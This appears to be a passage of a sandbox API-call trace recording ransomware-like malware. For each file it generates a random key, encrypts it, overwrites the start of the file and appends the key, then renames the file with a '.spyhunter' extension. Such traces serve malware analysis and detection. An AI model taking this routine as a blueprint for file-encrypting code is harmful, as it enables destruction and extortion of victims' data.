WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee5c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee5c*=0x30, lpOverlapped=0x0) returned 1 [0144.602] CloseHandle (hObject=0x178) returned 1 [0144.602] GetProcessHeap () returned 0x2c0000 [0144.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0144.602] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].spyhunter") returned 85 [0144.602] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].spyhunter")) returned 1 [0144.603] GetProcessHeap () returned 0x2c0000 [0144.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0144.603] GetProcessHeap () returned 0x2c0000 [0144.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0144.603] GetProcessHeap () returned 0x2c0000 [0144.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7668 | out: hHeap=0x2c0000) returned 1 [0144.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee98 | out: pbBuffer=0x270ee98) returned 1 [0144.604] GetProcessHeap () returned 0x2c0000 [0144.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0144.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee90*=0x30) returned 1 [0144.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0144.604] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 77 [0144.604] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0144.604] GetProcessHeap () returned 0x2c0000 [0144.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0144.604] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ee54*=0x43, lpOverlapped=0x0) returned 1 [0144.605] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0144.605] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ee54*=0x43, lpOverlapped=0x0) returned 1 [0144.605] GetProcessHeap () returned 0x2c0000 [0144.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0144.605] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.605] WriteFile (in: hFile=0x178, lpBuffer=0x270ee94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x270ee94*, lpNumberOfBytesWritten=0x270ee54*=0x4, lpOverlapped=0x0) returned 1 [0144.605] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee54*=0x30, lpOverlapped=0x0) returned 1 [0144.605] CloseHandle (hObject=0x178) returned 1 [0144.606] GetProcessHeap () returned 0x2c0000 [0144.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0144.606] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.spyhunter") returned 87 [0144.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.spyhunter")) returned 1 [0144.967] GetProcessHeap () returned 0x2c0000 [0144.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0144.967] GetProcessHeap () returned 0x2c0000 [0144.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0144.967] GetProcessHeap () returned 0x2c0000 [0144.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f5b8 | out: hHeap=0x2c0000) returned 1 [0144.968] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee98 | out: pbBuffer=0x270ee98) returned 1 [0144.968] GetProcessHeap () returned 0x2c0000 [0144.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0144.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee90*=0x30) returned 1 [0144.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.309] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe") returned 92 [0145.309] StrStrW (lpFirst="vcredist_x64.exe", lpSrch=".txt") returned 0x0 [0145.309] GetProcessHeap () returned 0x2c0000 [0145.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.309] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ee54*=0x2800, lpOverlapped=0x0) returned 1 [0145.396] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.396] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ee54*=0x2800, lpOverlapped=0x0) returned 1 [0145.396] GetProcessHeap () returned 0x2c0000 [0145.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.396] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.396] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x270ee94*, lpNumberOfBytesWritten=0x270ee54*=0x4, lpOverlapped=0x0) returned 1 [0145.538] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee54, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee54*=0x30, lpOverlapped=0x0) returned 1 [0145.538] CloseHandle (hObject=0xa0) returned 1 [0145.538] GetProcessHeap () returned 0x2c0000 [0145.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0145.538] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.spyhunter") returned 102 [0145.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.spyhunter")) returned 1 [0145.539] GetProcessHeap () returned 0x2c0000 [0145.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0145.539] GetProcessHeap () returned 0x2c0000 [0145.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.539] GetProcessHeap () returned 0x2c0000 [0145.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62ab8 | out: hHeap=0x2c0000) returned 1 [0145.539] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee90 | out: pbBuffer=0x270ee90) returned 1 [0145.539] GetProcessHeap () returned 0x2c0000 [0145.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.539] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee88*=0x30) returned 1 [0145.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.541] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 142 [0145.541] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0145.541] GetProcessHeap () returned 0x2c0000 [0145.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.541] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ee4c*=0x2800, lpOverlapped=0x0) returned 1 [0145.559] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.560] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ee4c*=0x2800, lpOverlapped=0x0) returned 1 [0145.560] GetProcessHeap () returned 0x2c0000 [0145.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.560] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.560] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x270ee8c*, lpNumberOfBytesWritten=0x270ee4c*=0x4, lpOverlapped=0x0) returned 1 [0145.560] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee4c*=0x30, lpOverlapped=0x0) returned 1 [0145.560] CloseHandle (hObject=0xa0) returned 1 [0145.560] GetProcessHeap () returned 0x2c0000 [0145.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.560] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.spyhunter") returned 152 [0145.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.spyhunter")) returned 1 [0145.561] GetProcessHeap () returned 0x2c0000 [0145.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.561] GetProcessHeap () returned 0x2c0000 [0145.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.561] GetProcessHeap () returned 0x2c0000 [0145.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4b50 | out: hHeap=0x2c0000) returned 1 [0145.561] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee90 | out: pbBuffer=0x270ee90) returned 1 [0145.561] GetProcessHeap () returned 0x2c0000 [0145.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.561] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee88*=0x30) returned 1 [0145.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.562] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn") returned 59 [0145.562] StrStrW (lpFirst="MS.GROOVE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.562] GetProcessHeap () returned 0x2c0000 [0145.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.562] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ee4c*=0x14c, lpOverlapped=0x0) returned 1 [0145.563] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.563] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ee4c*=0x14c, lpOverlapped=0x0) returned 1 [0145.563] GetProcessHeap () returned 0x2c0000 [0145.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.563] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.563] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x270ee8c*, lpNumberOfBytesWritten=0x270ee4c*=0x4, lpOverlapped=0x0) returned 1 [0145.563] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee4c*=0x30, lpOverlapped=0x0) returned 1 [0145.563] CloseHandle (hObject=0xa0) returned 1 [0145.563] GetProcessHeap () returned 0x2c0000 [0145.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.563] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.spyhunter") returned 69 [0145.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.groove.14.1033.hxn.spyhunter")) returned 1 [0145.564] GetProcessHeap () returned 0x2c0000 [0145.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.564] GetProcessHeap () returned 0x2c0000 [0145.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.564] GetProcessHeap () returned 0x2c0000 [0145.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe128 | out: hHeap=0x2c0000) returned 1 [0145.564] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee88 | out: pbBuffer=0x270ee88) returned 1 [0145.564] GetProcessHeap () returned 0x2c0000 [0145.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.564] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee80*=0x30) returned 1 [0145.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0145.565] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 58 [0145.565] StrStrW (lpFirst="MS.GRAPH.14.1033.hxn", lpSrch=".txt") returned 0x0 [0145.565] GetProcessHeap () returned 0x2c0000 [0145.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0145.565] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270ee44*=0x146, lpOverlapped=0x0) returned 1 [0145.566] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.566] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x270ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270ee44*=0x146, lpOverlapped=0x0) returned 1 [0145.566] GetProcessHeap () returned 0x2c0000 [0145.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0145.566] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.566] WriteFile (in: hFile=0xa0, lpBuffer=0x270ee84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ee44, lpOverlapped=0x0 | out: lpBuffer=0x270ee84*, lpNumberOfBytesWritten=0x270ee44*=0x4, lpOverlapped=0x0) returned 1 [0145.566] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ee44, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ee44*=0x30, lpOverlapped=0x0) returned 1 [0145.566] CloseHandle (hObject=0xa0) returned 1 [0145.566] GetProcessHeap () returned 0x2c0000 [0145.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.566] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.spyhunter") returned 68 [0145.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.spyhunter" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.spyhunter")) returned 1 [0145.618] GetProcessHeap () returned 0x2c0000 [0145.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.618] GetProcessHeap () returned 0x2c0000 [0145.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.619] GetProcessHeap () returned 0x2c0000 [0145.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe068 | out: hHeap=0x2c0000) returned 1 [0145.619] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee88 | out: pbBuffer=0x270ee88) returned 1 [0145.619] GetProcessHeap () returned 0x2c0000 [0145.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.619] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee80*=0x30) returned 1 [0145.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.626] GetProcessHeap () returned 0x2c0000 [0145.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.626] GetProcessHeap () returned 0x2c0000 [0145.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe9c8 | out: hHeap=0x2c0000) returned 1 [0145.626] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee80 | out: pbBuffer=0x270ee80) returned 1 [0145.626] GetProcessHeap () returned 0x2c0000 [0145.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.626] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee78*=0x30) returned 1 [0145.626] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.630] GetProcessHeap () returned 0x2c0000 [0145.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0145.630] GetProcessHeap () returned 0x2c0000 [0145.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efe5e8 | out: hHeap=0x2c0000) returned 1 [0145.631] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ee80 | out: pbBuffer=0x270ee80) returned 1 [0145.631] GetProcessHeap () returned 0x2c0000 [0145.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0145.631] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ee78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ee78*=0x30) returned 1 [0145.631] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 